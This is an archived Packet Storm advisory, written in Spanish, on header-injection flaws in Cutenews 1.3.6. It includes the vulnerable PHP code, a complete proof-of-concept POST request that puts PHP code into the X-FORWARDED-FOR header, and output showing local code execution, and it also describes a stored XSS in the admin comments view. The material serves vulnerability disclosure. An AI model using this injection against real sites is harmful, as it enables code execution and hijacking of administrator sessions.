what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

cutenews.txt

cutenews.txt
Posted Mar 1, 2005
Authored by FraMe | Site kernelpanik.org

Cutenews version 1.3.6 allows for cross site scripting and local code execution attacks. Written in Spanish. Detailed exploitation provided.

tags | exploit, local, code execution, xss
SHA-256 | 4ff35ce512b4b2ef759eb3df6051283b61c8390c04baf6a8e1f1fd0917983380

cutenews.txt

Change Mirror Download
=====================================================
cutenews 1.3.6: Remote XSS && Local Code Execution
=====================================================
FraMe - frame at kernelpanik.org
http://www.kernelpanik.org
=====================================================

cutenews es un script ligero para la gestión de contenido
web, principalmente noticias, y weblogs. Usa como sistema
de backend MySQL.

El fallo radica en el uso de las variables X-FORWARDED-FOR y CLIENT-IP
añadida generalmente por proxys transparente sin ningún
tipo de filtro intermedio, tomándola por buena en todas
las situaciones.

Esto permite, bien inyectar código HTML en el sistema de
comentarios, dentro del fichero comments.txt, con el que se podrán
llevar a cabo ataques XSS, o si nos encontramos en el mismo host de la
víctima, caso de multiples virtual hosts aislados mediante el uso de
cgi-wrappers, podremos inyectar y ejecutar código PHP desde el fichero
flood.db.php con los permisos de la víctima. La inyección remota de
código no es posible por el uso de un .htaccess protegiendo el acceso
desde ip's distintas a 127.0.0.1 para el directorio "./data"

La demostración del concepto se va a hacer sobre ejecución de código
local. Un XSS remoto en el sistema de administración de comentarios
es posible inyectando código jscript en el campo X-FORWARDED-FOR
que será ejecutado por el cliente web del administrador ante la
visita al sistema de administración de noticias/comentarios.

==== Detalles del código
==== Fichero: ./inc/show.inc.php

//----------------------------------
// Get the IP
//----------------------------------

if (getenv("HTTP_CLIENT_IP")) $ip = getenv("HTTP_CLIENT_IP");
else if(getenv("HTTP_X_FORWARDED_FOR")) $ip = getenv("HTTP_X_FORWARDED_FOR");
else if(getenv("REMOTE_ADDR")) $ip = getenv("REMOTE_ADDR");
else $ip = "not detected";

==== Proof of concept: Ejecución de código local

POST http://localhost/cutenews/show_news.php?subaction=showcomments&id=1108372700&archive=&start_from=&ucat= HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Referer: http://localhost/cutenews/show_news.php?subaction=showcomments&id=1108372700&archive=&start_from=&ucat=
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041111 Firefox/1.0
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
Keep-Alive: 300
X-FORWARDED-FOR: <?include("/proc/cpuinfo");?>

name=proof+of+concept&mail=&comments=proof+of+concept&submit=Add+My+Comment&subaction=addcomment&ucat=&show=&cutepath=/parla

==== Demo: include("/proc/cpuinfo");

frame@hawking$ links -dump http://localhost/cutenews/data/flood.db.php

1108929070|processor : 0 vendor_id : AuthenticAMD cpu family : 6 model : 8
model name : AMD Athlon(TM) XP 2000+ stepping : 1 cpu MHz : 1666.735 cache
size : 256 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu :
yes fpu_exception : yes cpuid level : 1 wp : yes flags : fpu vme de pse
tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 mmx fxsr sse
syscall mmxext 3dnowext 3dnow bogomips : 3322.67 |1108372700|

==== Línea de publicación

No hay línea de publicación.

==== Nota final

register_globals puesto a "off" no elimina esta vulnerabilidad.

================================
FraMe - frame at kernelpanik.org
http://www.kernelpanik.org
2005 (C) Kernelpanik Labs
================================
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close